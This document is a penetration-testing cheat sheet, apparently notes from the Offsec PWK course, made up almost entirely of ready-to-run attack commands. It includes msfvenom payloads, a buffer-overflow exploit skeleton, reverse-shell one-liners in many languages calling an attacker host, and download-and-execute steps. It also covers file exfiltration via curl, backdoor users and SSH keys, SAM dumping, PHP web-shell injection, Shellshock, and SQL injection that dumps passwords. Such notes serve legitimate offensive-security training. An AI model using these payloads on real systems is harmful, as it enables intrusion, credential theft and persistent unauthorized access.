Offsec PWK notes and frequently used files.
nmap++ 1.1.1.1
nbtscan -r 1.1.1.1
enum4linux -USGPoi 1.1.1.1 >> SMB.txt
smbclient -L 1.1.1.1
showmount -e 1.1.1.1
nmap -p 25 --script smtp-enum-users.nse,smtp-commands.nse 1.1.1.1
snmpcheck -t 1.1.1.1 >> ENUM-SNMP.txt
snmpwalk -c public 1.1.1.1 -v 2c
onesixtyone -c public.txt -o snmp-onesixtyone.txt -dd 1.1.1.1
nikto -o nikto.html -Display V -nolookup -host 1.1.1.1 && firefox nikto.html
dirb http://1.1.1.1 /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -l -o dirb.txt
Dirbuster: Change to 50 req/s, no recursion, export simple list.
msf > use auxiliary/scanner/ssh/ssh_enumusers
msfvenom -p windows/shell_reverse_tcp -f asp -o shell.asp LHOST=10.10.10.10 LPORT=443
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST 10.10.10.10
set LPORT 443
run
msfvenom -p windows/meterpreter_reverse_tcp -f exe -o metp.exe -e x86/shikata_ga_nai LHOST=10.10.10.10 LPORT=443
msfconsole
use exploit/multi/handler
set payload windows/meterpreter_reverse_tcp
set LHOST 10.10.10.10
set LPORT 443
run
export SMBHASH=903805A370A06846300175DD6E8654A6:4AFCBB33AC6EE45C73B37E5130F25971
pth-winexe -U john //1.1.1.1 cmd
i586-mingw32msvc-gcc MS08-067.c -o MS08-067.exe -lrpcrt4 -lws2_32 -lwsock32 -lmpr
i686-w64-mingw32-gcc MS08-067.c -o MS08-067.exe -lrpcrt4 -lws2_32 -lwsock32 -lmpr
./fuzzer.py
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
Debugger: write down the value of EIP (e.g. 39694438)
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438
3. Update the skeleton script to match the new buffer size, then pad with 4 bytes of a different character (\x42) to overwrite EIP.
buffer = "A" * 2604 + "B" * 4
buffer = "A" * 2604 + "B" * 4 + "C" * 400
buffer = "A" * 2604 + "B" * 4 + badchars
Criteria:
1. Does not contain bad characters
2. Does not use DEP or ASLR
Using Mona:
!mona modules
!mona find -s “\xff\xe4” -m slmfc.dll
buffer = "A" * 2604 + "\x8f\x35\x4a\x6f"
buffer = "A" * 2604 + "\x8f\x35\x4a\x6f" + "\x90" * 8
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x09\x0a"
buffer = "A" * 2604 + "\x8f\x35\x4a\x6f" + "\x90" * 8 + shellcode
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
msfconsole
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.10.10.10
set LPORT 443
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 10
msfconsole
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.10.10.10
set LPORT 443
msfvenom -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 10
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.10.10.10
set LPORT 443
ncrack -vv --user rax -P wordlist.txt rdp://1.1.1.1
medusa -h 1.1.1.1 -u root -P /usr/share/wordlists/rockyou.txt -e ns -M ssh
hydra -l administrator -P wordlist.txt 1.1.1.1 ssh
hydra 1.1.1.1:80 http-form-post "/PHP/index.php:nickname=^USER^&password=^PASS^:bad password" -l garry -P /usr/share/wordlists/nmap.lst -t 10 -w 30 -o hydra-http-post-attack.txt
cewl http://1.1.1.1/index.html >> words.txt
john --wordlist=words.txt --rules --stdout >> wordlist.txt
cat shadow.txt | awk -F':' '{print }' > hashes.txt
hashcat -m 500 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1800 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 -a 0 -o output.txt --remove hashes.txt /usr/share/wordlists/rockyou.txt
Local IP: 10.10.10.10
bash -i >& /dev/tcp/10.10.10.10/7777 0>&1
sh -i >& /dev/tcp/10.10.10.10/7777 0>&1
perl -e 'use Socket;$i="10.10.10.10";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10”,7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.10.10.10”,7777);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10”,7777).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Linux
nc -vn 10.10.10.10 7777 -e /bin/sh
Windows
nc.exe -vn 10.10.10.10 7777 -e cmd.exe
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/7777;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
powershell.exe
$client = New-Object System.Net.Sockets.TCPClient(“10.10.10.10”,7777);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
PowerShell with nc.exe or another rev shell .exe
PowerShell (New-Object System.Net.WebClient).DownloadFile('http://10.10.10.10/files/meterpreter.exe','meterpreter.exe');Start-Process ‘meterpreter.exe'
http://1.1.1.1/backdoor.php?cmd=%22nc.exe%20-vn%2010.10.10.10%207777%20-e%20cmd.exe%22
python -c 'import pty; pty.spawn("/bin/sh")'
wget 10.10.10.10/linuxprivchecker.py
python linuxprivchecker.py
wget 10.10.10.10/linux-enum-mod.sh
chmod +x linux-enum-mod.sh
sh linux-enum-mod.sh
wget 10.10.10.10/linux-local-enum.sh
chmod +x linux-local-enum.sh
sh linux-local-enum.sh
wget 10.10.10.10/unix-privesc-check
chmod +x ./unix-privesc-check
./unix-privesc-check
wget 10.10.10.10/solaris-exploit-suggester.pl
perl solaris-exploit-suggester.pl
Local
./linux-exploit-suggester.sh --uname 2.6.18-274.3.1.el5
uname -a
id
cat /etc/*-release
cat /proc/version
cat /etc/issue
ifconfig -a
netstat -ano
netstat --tcp
netstat -s --tcp
nmap -p - -sV localhost
cat /etc/passwd
cat /etc/hosts
arp -a
iptables -L
crontab -l
cat /root/.ssh/known_hosts
find . -name "*password*"
cat process.txt | grep root | cut -d " " -f 9 | grep "\[" | cut -d "[" -f 2 | cut -d "]" -f1 | cut -d "/" -f1 >> root_process.txt
cat root_process.txt | sort -u > proccess.txt
for i in `cat process.txt` ; do searchsploit %i ; done
wpc.exe --audit -a -o report
cd /Offsec
python windows-exploit-suggester.py --database 2018-09-02-mssb.xls --systeminfo sys-info.txt
python windows-exploit-suggester.py --database 2018-09-02-mssb.xls --ostext 'Windows Server 2008 R2'
tree /f /a
systeminfo
type boot.ini
hostname
ipconfig /all
netstat -ano
nmap.exe -p - -sV localhost
net users
net localgroups
route print
arp -A
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
schtasks /query /fo LIST /v
net start
accesschk.exe -uwcqv "Authenticated Users" *
dir network-secret.txt /s
run arp_scanner -r 1.1.1.0/24
use auxiliary/scanner/portscan/tcp
use post/windows/escalate/getsystem
Windows Privilege Escalation Matrix
wget -O exploit.c 10.10.10.10/exploit.c
curl --upload-file /etc/passwd http://10.10.10.10
Local (start the service)
atftpd --daemon --port 69 /tftp
Remote
tftp -i 10.10.10.10 get nc.exe
echo USER>> ftp.txt
echo offsec>>ftp.txt
echo lab123>>ftp.txt
echo binary>>ftp.txt
echo get nc.exe>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt 10.10.10.10
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.10.10/fgdump.exe" >>wget.ps1
echo $file = "new.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
dir network-secret.txt /s
find . -name "network-secret.txt"
windump -i 2 -w capture -n -U -s 0 src not 10.10.10.10 and dst not 10.10.10.10
tcpdump -w capture -n -U -s 0 src not 10.10.10.10 and dst not 10.10.10.10
p0f -i eth0 'src not 10.10.10.10 or dst not 10.10.10.10'
Maintain Access
Local machine
cat ~/.ssh/id_rsa.pub
Remote machine
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8q88wXf4E+dmEHH2ccGhGCgNdfgq4y9l4jthBxgGIzztnQs438/WxD+Fm2fwaya3YwLip3da6Pj2x1aH08Y8kYPgou8M+MXC1hD0z5YxZ4W7htfSb3X7a8mKRavcv8h1efyqdCwdzhJG48ZEHDQnspuv2DzwzynFDR89C0M8h5gw0X2Tj3ztl5tOhhJymPWVNHDnLFLDLUFuxC74gEz7rCurWvb1wKZ+XJfurr07ZmWId4tEdb04sabyEru/iEgUJawTbszHQA53BocY64qMcGgWze51RbfQ8ijqkKc88SkVlOxFKI3ecZp3lmeFaAuy8UO3Jx1GNO22SBmEz/v root@Kali" >> /root/.ssh/authorized_keys
useradd -u 1037 -g users -d /home/rax -s /bin/bash -p $(echo 1234 | openssl passwd -1 -stdin) rax
net user rax Cisco123 /add && net localgroup Administrators rax /add
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
net start Termservice
netsh.exe
firewall
add portopening TCP 3389 "Remote Desktop"
reg save HKLM\SAM %computername%.sam
reg save HKLM\SYSTEM %computername%.system
fgdump.exe
portfwd add -l 8000 -p 3389 -r 1.1.1.1
All connections to 1.1.1.1:9000 will be forwarded to 2.2.2.2:80
vi /etc/rinetd.conf
# bindaddress bindport connectaddress connectport
1.1.1.1 9000 2.2.2.2 80
rinetd
The local machine connects to a host on the outside (1.1.1.1) through SSH and then forwards traffic sent to the local loopback on a given port (9090) to a host on the Internet (2.2.2.2) on a remote port (443)
ssh [email protected] -L 9090:2.2.2.2:443
A remote host connects to my machine (10.10.10.10) through SSH, which is running on port 53, and publishes one of its open ports (10443) through my local loopback on a local port (10000)
ssh 10.10.10.10 -p 53 -R 10000:127.0.0.1:10443
The local machine connects to a remote host 1.1.1.1 and proxies its traffic through the remote host to another host 2.2.2.2
ssh -D 8080 [email protected]
proxychains nmap -p 22,80,222,10000 -sT -Pn 2.2.2.2
Mapping and Scanning (unauthenticated)
1. Browse Site Using ZAP, check all normal functionalities
2. Go to root directory, right click, spider
3. Right Click Active Scan, Show Advanced, select applicable technologies and OS, run
Authentication
1. Right click add to new context
2. Session Management (most likely will be cookie based)
3. Go to the Web app and Authenticate
4. Check the Session Tree and look for a POST to the login form, right-click it and then select "Flag as context", Form Based Authentication Request.
5. Select Username and Password parameter from the dropdown
6. Go back to the session tree, look for the POST to the login form again, check the response tab and look for a "logged in indicator" in the HTML source code, then right-click, flag as context, logged in indicator.
7. Add Users under the context “users” tab
8. Right-click on the index page, attack, then spider, and select the user from the drop-down.
9. Right-click on the context, active scan, and select the user from the drop-down.
Review Source Code
Review Response Headers
CMS: Review CMS type, version, manual and default admin credentials
curl "https://1.1.1.1/<?php echo shell_exec($_GET['cmd']);?>"
curl "https://1.1.1.1/%3C%3Fphp%20echo%20shell_exec%28%24_GET%5B%27cmd%27%5D%29%3B%3F%3E"
curl "https://1.1.1.1/section.php?cmd=cat%20/etc/passwd&page=../../../../../proc/self/fd/10%00"
Shellshock
curl http://1.1.1.1/cgi-bin/admin.cgi -H"User-Agent:() { :; }; /bin/bash -c ifconfig “
Vulnerable URL/Parameter:
http://1.1.1.1/mvc/Product.aspx?id=1
id=1'
id=1 order by 1
id=1 order by 2
...
id=1 order by 9
id=1 union all select 1,2,3,4,5,6,7,8
id=-1 UNION SELECT version(),2,3,4,5,6,7,8
id=99999 UNION SELECT user(),2,3,4,5,6,7,8
id=1=2 UNION SELECT database(),2,3,4,5,6,7,8
id=0 and 1=2 UNION SELECT table_name,2,3,4,5,6,7,8 from information_schema.tables where table_schema='bricks'
id=0 and 1=2 UNION SELECT column_name,2,3,4,5,6,7,8 from information_schema.columns where table_schema='bricks' and table_name='users' LIMIT 0,1 -- -
...
id=0 and 1=2 UNION SELECT column_name,2,3,4,5,6,7,8 from information_schema.columns where table_schema='bricks' and table_name='users' LIMIT 7,1 -- -
id=0 and 1=2 UNION SELECT concat(name,CHAR(32),password),2,3,4,5,6,7,8 from bricks.users LIMIT 0,1 -- -
...
id=0 and 1=2 UNION SELECT concat(name,CHAR(32),password),2,3,4,5,6,7,8 from bricks.users LIMIT 7,1 -- -
id=0 'UNION ALL SELECT 1,2,3,4,5,"<?php echo shell_exec($_GET[\"cmd\"]);?>" into OUTFILE "/var/www/html/rax.php”
id=0 'UNION ALL SELECT "<?php echo shell_exec($_GET[\"cmd\"]);?>",2,3,4,5,6 into OUTFILE "c:/xampp/htdocs/rax.php" #;
http://1.1.1.1/index.php?slogin_path=http://10.10.10.10/php-reverse-shell.txt?
http://1.1.1.1/index.php?slogin_path=http://10.10.10.10/php-reverse-shell.txt%00
Other Resources
Pentest Monkey MySQL Injection Cheat Sheet
Pentest Monkey MSSQL Injection Cheat Sheet
- Always Review Source Code
- Check Sudo Version
- In most cases RFI vulns can be used as LFIs too
- In most cases LFIs can be used to read arbitrary files on the system